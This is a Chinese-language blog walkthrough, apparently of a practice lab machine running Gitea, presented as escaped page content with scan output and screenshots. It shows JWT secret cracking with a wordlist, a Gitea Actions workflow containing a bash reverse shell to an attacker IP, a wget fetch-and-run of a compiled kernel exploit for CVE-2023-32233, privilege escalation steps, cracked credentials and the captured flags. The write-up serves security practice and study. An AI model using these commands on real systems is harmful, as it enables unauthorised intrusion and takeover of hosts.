:\nSF-Port3000-TCP:V=7.94SVN%I=7%D=3\/24%Time=65FFB063%P=x86_64-pc-linux-gnu%r\nSF:(GenericLines,67,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x\nSF:20text\/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Ba\nSF:d\\x20Request")%r(GetRequest,1000,"HTTP\/1\\.0\\x20200\\x20OK\\r\\nCache-Contr\nSF:ol:\\x20max-age=0,\\x20private,\\x20must-revalidate,\\x20no-transform\\r\\nCo\nSF:ntent-Type:\\x20text\/html;\\x20charset=utf-8\\r\\nSet-Cookie:\\x20i_like_git\nSF:ea=e657b800ab664b37;\\x20Path=\/;\\x20HttpOnly;\\x20SameSite=Lax\\r\\nSet-Coo\nSF:kie:\\x20_csrf=hdA99ulTmbdchrsbuBdsBWUT4qg6MTcxMTI1NTY1MzY2Njk4MjI5NQ;\\x\nSF:20Path=\/;\\x20Max-Age=86400;\\x20HttpOnly;\\x20SameSite=Lax\\r\\nX-Frame-Opt\nSF:ions:\\x20SAMEORIGIN\\r\\nDate:\\x20Sun,\\x2024\\x20Mar\\x202024\\x2004:47:33\\x\nSF:20GMT\\r\\n\\r\\n<!DOCTYPE\\x20html>\\n<html\\x20lang=\\"en-US\\"\\x20class=\\"the\nSF:me-auto\\">\\n<head>\\n\\t<meta\\x20name=\\"viewport\\"\\x20content=\\"width=dev\nSF:ice-width,\\x20initial-scale=1\\">\\n\\t<title>Gitea:\\x20Git\\x20with\\x20a\\x\nSF:20cup\\x20of\\x20tea<\/title>\\n\\t<link\\x20rel=\\"manifest\\"\\x20href=\\"data:\nSF:application\/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHR\nSF:lYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3Rhcn\nSF:RfdXJsIjoiaHR0cDovLzE5Mi4xNjguMS45OjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0d\nSF:HA6Ly8xOTIuMTY4LjEuOTozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1h\nSF:Z2UvcG5nIiwic2l6ZXM")%r(Help,67,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\nSF:Content-Type:\\x20text\/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\nSF:\\n\\r\\n400\\x20Bad\\x20Request")%r(HTTPOptions,1A4,"HTTP\/1\\.0\\x20405\\x20Me\nSF:thod\\x20Not\\x20Allowed\\r\\nAllow:\\x20HEAD\\r\\nAllow:\\x20HEAD\\r\\nAllow:\\x2\nSF:0GET\\r\\nCache-Control:\\x20max-age=0,\\x20private,\\x20must-revalidate,\\x2\nSF:0no-transform\\r\\nSet-Cookie:\\x20i_like_gitea=bbc8d31aced2309c;\\x20Path=\nSF:\/;\\x20HttpOnly;\\x20SameSite=Lax\\r\\nSet-Cookie:\\x20_csrf=07xHOkM3ddUge-6\nSF:XE4DkGk67QW86MTcxMTI1NTY1ODY4Nzk5ODQzNw;\\x20Path=\/;\\x20Max-Age=86400;\\x\nSF:20HttpOnly;\\x20SameSite=Lax\\r\\nX-Frame-Options:\\x20SAMEORIGIN\\r\\nDate:\\\nSF:x20Sun,\\x2024\\x20Mar\\x202024\\x2004:47:38\\x20GMT\\r\\nContent-Length:\\x200\nSF:\\r\\n\\r\\n")%r(RTSPRequest,67,"HTTP\/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nCont\nSF:ent-Type:\\x20text\/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\nSF:\\n400\\x20Bad\\x20Request");<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\nsudo dirsearch -u http:\/\/10.0.2.10:3000 -e* -i 200,300,399 2>\/dev\/null<\/code><\/pre>\n[00:53:25] 200 - 1KB - \/.well-known\/openid-configuration\n[00:53:25] 200 - 206B - \/.well-known\/security.txt\n[00:53:34] 200 - 16KB - \/administrator\n[00:53:34] 200 - 16KB - \/administrator\/\n[00:53:36] 200 - 704B - \/api\/swagger\n[00:53:42] 200 - 18KB - \/dev\n[00:53:42] 200 - 18KB - \/dev\/\n[00:53:44] 200 - 15KB - \/explore\/repos\n[00:54:04] 200 - 283B - \/sitemap.xml\n[00:54:09] 200 - 10KB - \/user\/login\/<\/code><\/pre>\n\u6f0f\u6d1e\u6316\u6398<\/h2>\n\u8bbf\u95ee\u4e00\u4e0b\uff1a<\/h3>\n
<\/div><\/p>\n\u8bbf\u95ee\u654f\u611f\u76ee\u5f55<\/h3>\nhttp:\/\/10.0.2.10:3000\/.well-known\/security.txt<\/code><\/pre>\n# This site is running a Gitea instance.\n# Gitea related security problems could be reported to Gitea community.\n# Site related security problems should be reported to this site's admin.\nContact: https:\/\/github.com\/go-gitea\/gitea\/blob\/main\/SECURITY.md\nPolicy: https:\/\/github.com\/go-gitea\/gitea\/blob\/main\/SECURITY.md\nPreferred-Languages: en<\/code><\/pre>\nhttp:\/\/10.0.2.10:3000\/.well-known\/openid-configuration<\/code><\/pre>\n{\n "issuer": "http:\/\/192.168.1.9:3000\/",\n "authorization_endpoint": "http:\/\/192.168.1.9:3000\/login\/oauth\/authorize",\n "token_endpoint": "http:\/\/192.168.1.9:3000\/login\/oauth\/access_token",\n "jwks_uri": "http:\/\/192.168.1.9:3000\/login\/oauth\/keys",\n "userinfo_endpoint": "http:\/\/192.168.1.9:3000\/login\/oauth\/userinfo",\n "introspection_endpoint": "http:\/\/192.168.1.9:3000\/login\/oauth\/introspect",\n "response_types_supported": [\n "code",\n "id_token"\n ],\n "id_token_signing_alg_values_supported": [\n "RS256"\n ],\n "subject_types_supported": [\n "public"\n ],\n "scopes_supported": [\n "openid",\n "profile",\n "email",\n "groups"\n ],\n "claims_supported": [\n "aud",\n "exp",\n "iat",\n "iss",\n "sub",\n "name",\n "preferred_username",\n "profile",\n "picture",\n "website",\n "locale",\n "updated_at",\n "email",\n "email_verified",\n "groups"\n ],\n "code_challenge_methods_supported": [\n "plain",\n "S256"\n ],\n "grant_types_supported": [\n "authorization_code",\n "refresh_token"\n ]\n}<\/code><\/pre>\n<\/div>
\n<\/div>
\n<\/div>
\n<\/div><\/p>\njwt\u7206\u7834<\/h3>\n
\u627e\u5230jwt_token<\/code>\uff0c\u89e3\u5bc6\u4e00\u4e0b\uff1a<\/p>\njwt_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcwNzE0ODY1OCwianRpIjoiNjAwMWI5N2YtZjllOC00YTIxLThlYWMtYmE5NWEwY2Y4MDQ4IiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldiIsIm5iZiI6MTcwNzE0ODY1OCwiY3NyZiI6ImFkZjdmOTBiLWQ2NDctNDljZS1hNGRhLTQ3NDI1OWZkYzcyYyIsImV4cCI6MTcwNzE0OTI1OCwidXNlcm5hbWUiOiJkZXYifQ.tRZPFKRfJV7T-EHyQiBFqDEE1hl83MyCGtaBpSMwU_o"<\/code><\/pre>\n<\/div><\/p>\n\u53d1\u73b0\u4e86username<\/code>\uff0c\u5c1d\u8bd5\u4f7f\u7528john<\/code>\u7206\u7834\u4e00\u4e0b\uff1a<\/p>\npython jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcwNzE0ODY1OCwianRpIjoiNjAwMWI5N2YtZjllOC00YTIxLThlYWMtYmE5NWEwY2Y4MDQ4IiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldiIsIm5iZiI6MTcwNzE0ODY1OCwiY3NyZiI6ImFkZjdmOTBiLWQ2NDctNDljZS1hNGRhLTQ3NDI1OWZkYzcyYyIsImV4cCI6MTcwNzE0OTI1OCwidXNlcm5hbWUiOiJkZXYifQ.tRZPFKRfJV7T-EHyQiBFqDEE1hl83MyCGtaBpSMwU_o -C -d \/usr\/share\/wordlists\/rockyou.txt<\/code><\/pre>\n<\/div><\/p>\ndev\ndeveloper88<\/code><\/pre>\n\u767b\u5f55\u5e76\u53cd\u5f39shell<\/h3>\n
\u6709\u4e86\u8d26\u53f7\u5bc6\u7801\uff0c\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\ngit clone http:\/\/10.0.2.10:3000\/dev\/revershell.git\ncd revershell\nmkdir .gitea\ncd .gitea\nmkdir workflows\ncd workflows\nvim revershell.yaml<\/code><\/pre>\non: [push]\njobs:\n revershell:\n runs-on: run\n steps:\n - run: \/bin\/bash -i >& \/dev\/tcp\/10.0.2.4\/1234 0>&1<\/code><\/pre>\n<\/div><\/p>\n\u5c1d\u8bd5\u63d0\u4ea4\u66f4\u6539\uff1a<\/p>\n
git config user.email "dev@run.hmv"\ngit config user.name "dev"\ngit add .\ngit commit -m "revershell.yaml"\ngit push origin main<\/code><\/pre>\n<\/div><\/p>\n\u51c6\u5907\u53cd\u5f39\u7684\u65f6\u5019\u53d1\u73b0\u62a5\u9519\u4e86\uff1a<\/p>\n
Workflow config file is invalid. Please check your config file: yaml: line 3: found character that cannot start any token<\/code><\/pre>\n\u662f\u7f29\u8fdb\u6709\u95ee\u9898\uff0c\u6539\u4e86\u4e00\u4e0b\u5c31\u597d\u4e86\uff1a<\/p>\n
on: [push]\njobs:\n revershell:\n runs-on: run\n steps:\n - run: \/bin\/bash -i >& \/dev\/tcp\/10.0.2.4\/1234 0>&1<\/code><\/pre>\n<\/div>
\n<\/div><\/p>\n\u8981\u5148\u76d1\u542c\u518d\u542f\u52a8\u54e6\u3002<\/p>\n
\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\nact@db7db77ba113:~\/cache\/actions\/d05059a1ad22d066\/hostexecutor$ whoami\n# act\nact@db7db77ba113:~\/cache\/actions\/d05059a1ad22d066\/hostexecutor$ id\n# id\n# uid=1000(act) gid=1000(act) groups=1000(act),27(sudo),100(users),115(docker115)\nact@db7db77ba113:~\/cache\/actions\/d05059a1ad22d066\/hostexecutor$ find \/ -perm -u=s -type f 2>\/dev\/null\n# <hostexecutor$ find \/ -perm -u=s -type f 2>\/dev\/null \n# \/usr\/bin\/su\n# \/usr\/bin\/chfn\n# \/usr\/bin\/mount\n# \/usr\/bin\/gpasswd\n# \/usr\/bin\/newgrp\n# \/usr\/bin\/chsh\n# \/usr\/bin\/passwd\n# \/usr\/bin\/umount\n# \/usr\/bin\/sudo\n# \/usr\/lib\/openssh\/ssh-keysign\nact@db7db77ba113:~\/cache\/actions\/d05059a1ad22d066\/hostexecutor$ sudo -l\n# sudo -l\n# Matching Defaults entries for act on db7db77ba113:\n# env_reset, mail_badpass,\n# secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin,\n# use_pty\n\n# User act may run the following commands on db7db77ba113:\n# (ALL : ALL) ALL\n# (ALL) NOPASSWD: ALL<\/code><\/pre>\n\u63d0\u6743\u81f3docker root<\/h3>\nact@db7db77ba113:~\/cache\/actions\/d05059a1ad22d066\/hostexecutor$ sudo su\n# sudo su\nwhoami\n# root\nid\n# uid=0(root) gid=0(root) groups=0(root)\ncd \/root\nls -la\n# total 20\n# drwx------ 1 root root 4096 Mar 24 04:41 .\n# drwxr-xr-x 1 root root 4096 Mar 24 04:41 ..\n# -rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc\n# -rw-r--r-- 1 root root 161 Jul 9 2019 .profile\n# drwx------ 2 root root 4096 Feb 6 08:11 .ssh\n# -rw-r--r-- 1 root root 0 Mar 24 04:41 .sudo_as_admin_successful<\/code><\/pre>\n\u6269\u5c55shell<\/h4>\nscript \/dev\/null -c bash\n# Script started, output log file is '\/dev\/null'.<\/code><\/pre>\n\u5207\u6362\u81f3dev\u7528\u6237<\/h3>\nroot@db7db77ba113:~# ip a\nip a\n1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\n link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n inet 127.0.0.1\/8 scope host lo\n valid_lft forever preferred_lft forever\n12: eth0@if13: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default \n link\/ether 02:42:ac:12:00:04 brd ff:ff:ff:ff:ff:ff link-netnsid 0\n inet 172.18.0.4\/16 brd 172.18.255.255 scope global eth0\n valid_lft forever preferred_lft forever<\/code><\/pre>\n\u5c1d\u8bd5 ssh \u8fde\u63a5\u4e00\u4e0b\uff1a<\/p>\n
su dev\n# su: user dev does not exist or the user entry does not contain all the required fields\nssh dev@172.18.0.4\n# ssh: connect to host 172.18.0.4 port 22: Connection refused<\/code><\/pre>\n\u770b\u6765\u4e0d\u80fd\u778e\u641e\uff0c\u4f20\u4e00\u4e2afscan<\/code>\u626b\u63cf\u4e00\u4e0b\uff1a<\/p>\nfscan\u626b\u63cf<\/h4>\n
<\/div><\/p>\n\u53d1\u73b0\u4e24\u4e2a\u5f00\u542f\u4e8622\u7aef\u53e3\uff0c\u5c1d\u8bd5\u8fdb\u884c\u8fde\u63a5\uff1a<\/p>\n
<\/div><\/p>\n\u63d0\u6743\u81f3root<\/h3>\n\u4fe1\u606f\u641c\u96c6<\/h4>\ndev@run:~$ sudo -l\nsudo -l\n# [sudo] password for dev: developer88\n\n# Sorry, user dev may not run sudo on run.\ndev@run:~$ whoami;id\nwhoami;id\n# dev\n# uid=1000(dev) gid=1000(dev) groups=1000(dev)\ndev@run:~$ find \/ -perm -u=s -type f 2>\/dev\/null\nfind \/ -perm -u=s -type f 2>\/dev\/null\n# \/usr\/bin\/fusermount3\n# \/usr\/bin\/su\n# \/usr\/bin\/chfn\n# \/usr\/bin\/mount\n# \/usr\/bin\/sudo\n# \/usr\/bin\/gpasswd\n# \/usr\/bin\/newgrp\n# \/usr\/bin\/chsh\n# \/usr\/bin\/passwd\n# \/usr\/bin\/umount\n# \/usr\/libexec\/polkit-agent-helper-1\n# \/usr\/lib\/openssh\/ssh-keysign\n# \/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\ndev@run:~$ ls -la\nls -la\n# total 32\n# drwxr-x--- 4 dev dev 4096 Mar 24 06:49 .\n# drwxr-xr-x 3 root root 4096 Feb 5 13:10 ..\n# lrwxrwxrwx 1 root root 9 Feb 5 13:40 .bash_history -> \/dev\/null\n# -rw-r--r-- 1 dev dev 220 Jan 7 2023 .bash_logout\n# -rw-r--r-- 1 dev dev 3771 Jan 7 2023 .bashrc\n# drwx------ 2 dev dev 4096 Mar 24 06:49 .cache\n# -rw-r--r-- 1 dev dev 807 Jan 7 2023 .profile\n# drwx------ 2 dev dev 4096 Feb 5 13:10 .ssh\n# -rw------- 1 dev dev 33 Feb 6 16:01 user.txt\ndev@run:~$ cat user.txt\ncat user.txt\n# 56f98bdfaf5186243bc4cb99f0674f58\ndev@run:~$ cat \/etc\/cron*\ncat \/etc\/cron*\n# cat: \/etc\/cron.d: Is a directory\n# cat: \/etc\/cron.daily: Is a directory\n# cat: \/etc\/cron.hourly: Is a directory\n# cat: \/etc\/cron.monthly: Is a directory\n# # \/etc\/crontab: system-wide crontab\n# # Unlike any other crontab you don't have to run the `crontab'\n# # command to install the new version when you edit this file\n# # and files in \/etc\/cron.d. These files also have username fields,\n# # that none of the other crontabs do.\n\n# SHELL=\/bin\/sh\n# # You can also override PATH, but by default, newer versions inherit it from the environment\n# #PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# # Example of job definition:\n# # .---------------- minute (0 - 59)\n# # | .------------- hour (0 - 23)\n# # | | .---------- day of month (1 - 31)\n# # | | | .------- month (1 - 12) OR jan,feb,mar,apr ...\n# # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# # | | | | |\n# # * * * * * user-name command to be executed\n# 17 * * * * root cd \/ && run-parts --report \/etc\/cron.hourly\n# 25 6 * * * root test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.daily; }\n# 47 6 * * 7 root test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.weekly; }\n# 52 6 1 * * root test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.monthly; }\n# cat: \/etc\/cron.weekly: Is a directory\ndev@run:~$ cat \/etc\/passwd\ncat \/etc\/passwd\n# root:x:0:0:root:\/root:\/bin\/bash\n# daemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\n# bin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\n# sys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\n# sync:x:4:65534:sync:\/bin:\/bin\/sync\n# games:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\n# man:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\n# lp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\n# mail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\n# news:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\n# uucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\n# proxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\n# www-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\n# backup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\n# list:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\n# irc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n# _apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\n# nobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n# systemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\n# systemd-timesync:x:997:997:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\n# messagebus:x:100:106::\/nonexistent:\/usr\/sbin\/nologin\n# systemd-resolve:x:996:996:systemd Resolver:\/:\/usr\/sbin\/nologin\n# pollinate:x:101:1::\/var\/cache\/pollinate:\/bin\/false\n# syslog:x:103:109::\/nonexistent:\/usr\/sbin\/nologin\n# uuidd:x:104:110::\/run\/uuidd:\/usr\/sbin\/nologin\n# tcpdump:x:105:111::\/nonexistent:\/usr\/sbin\/nologin\n# tss:x:106:112:TPM software stack,,,:\/var\/lib\/tpm:\/bin\/false\n# landscape:x:107:113::\/var\/lib\/landscape:\/usr\/sbin\/nologin\n# fwupd-refresh:x:108:114:fwupd-refresh user,,,:\/run\/systemd:\/usr\/sbin\/nologin\n# dev:x:1000:1000:dev:\/home\/dev:\/bin\/bash\n# lxd:x:999:100::\/var\/snap\/lxd\/common\/lxd:\/bin\/false\n# dnsmasq:x:109:65534:dnsmasq,,,:\/var\/lib\/misc:\/usr\/sbin\/nologin\n# sshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\ndev@run:~$ uname -a\nuname -a\n# Linux run 6.2.0-20-generic #20-Ubuntu SMP PREEMPT_DYNAMIC Thu Apr 6 07:48:48 UTC 2023 x86_64 x86_64 x86_64 GNU\/Linux\ndev@run:~$ lsb_release -a\nlsb_release -a\n# No LSB modules are available.\n# Distributor ID: Ubuntu\n# Description: Ubuntu 23.04\n# Release: 23.04\n# Codename: lunar<\/code><\/pre>\n\u6b64\u5916\u8fd8\u8fdb\u884c\u4e86\u4ee5\u4e0b\u63a2\u7d22\uff0c\u5c31\u4e0d\u7c98\u8d34\u4e0a\u53bb\u4e86\uff1a<\/p>\n
cat \/etc\/profile\nps aux \nps aux | grep root\nls -alh \/usr\/bin\/ \ncat \/etc\/resolv.conf <\/code><\/pre>\n\u4f46\u662f\u5747\u65e0\u679c\uff0c\u770b\u4e86\u88ab\u4eba\u601d\u8def\u53d1\u73b0\u662f\u4e2a\u5185\u6838\u63d0\u6743\u3002\u3002\u3002\u3002\u3002\u3002<\/p>\n
\u5185\u6838\u63d0\u6743<\/h3>\n
<\/div><\/p>\n# kali\ngit clone https:\/\/github.com\/Liuk3r\/CVE-2023-32233.git\ncd CVE-2023-32233\nsudo apt install gcc libmnl-dev libnftnl-dev\ngcc -Wall -o exploit exploit.c -lmnl -lnftnl\npython3 -m http.server 8888<\/code><\/pre>\n# dev\ncd \/tmp\nwget http:\/\/10.0.2.4:8888\/exploit\nchmod +x exploit\n.\/exploit<\/code><\/pre>\n\u6211\u8fd9\u8fb9\u91cd\u542f\u4e86\u4e00\u4e0b\u9776\u673a\uff0c\u91cd\u65b0\u6765\u4e86\u4e00\u6b21\uff1a<\/p>\n
<\/div><\/p>\n\u83b7\u5f97\u4e86rootshell\uff01\uff01\uff01<\/p>\n
\u5bfb\u627eflag<\/h3>\n# whoami;id\nwhoami;id\n# root\n# uid=0(root) gid=0(root) groups=0(root),1000(dev)\ncd \/root\ncd \/root\nls\n# ls\n# 1 root.txt script.sh\ncat script.sh\n# cat script.sh\n# cd \/opt\/gitea && docker-compose down\n# cd \/opt\/gitea && docker-compose up -d\n# systemctl enable --now ssh.service\ncat root.txt\n# cat root.txt\n# 008b138f906537f51a5a5c2c69c4b8a2<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"run \u554a\uff0ccrazy\uff0c\u662f\u8fd9\u4e2a\u5417\uff1f \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf nmap -sCV -p- 10.0.2.10 POR […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-454","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/454","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=454"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/454\/revisions"}],"predecessor-version":[{"id":455,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/454\/revisions\/455"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=454"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=454"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=454"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"image-20240324125132363\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403241541069.png\")
<\/div><\/p>\n![\"image-20240324125943279\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403241541071.png\")
<\/div>![\"image-20240324130109986\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403241541072.png\")
<\/div>![\"image-20240324130248375\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403241541073.png\")
<\/div>![\"image-20240324130334109\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403241541074.png\")
<\/div><\/p>\n![\"image-20240324130540683\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403241541075.png\")
<\/div><\/p>\n![\"image-20240324133645699\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403241541076.png\")
<\/div><\/p>\n![\"image-20240324134059164\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403241541077.png\")
<\/div>![\"image-20240324134425462\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403241541078.png\")
<\/div><\/p>\n![\"image-20240324135221059\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403241541080.png\")
<\/div><\/p>\n![\"image-20240324135455075\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403241541081.png\")
<\/div><\/p>\n![\"image-20240324141234434\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403241541082.png\")
<\/div>![\"image-20240324141518445\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403241541083.png\")
<\/div><\/p>\n![\"image-20240324144711303\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403241541084.png\")
<\/div><\/p>\n![\"image-20240324144935462\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403241541085.png\")
<\/div><\/p>\n![\"image-20240324150340293\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403241541086.png\")
<\/div><\/p>\n![\"image-20240324153932074\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403241541087.png\")
<\/div><\/p>\n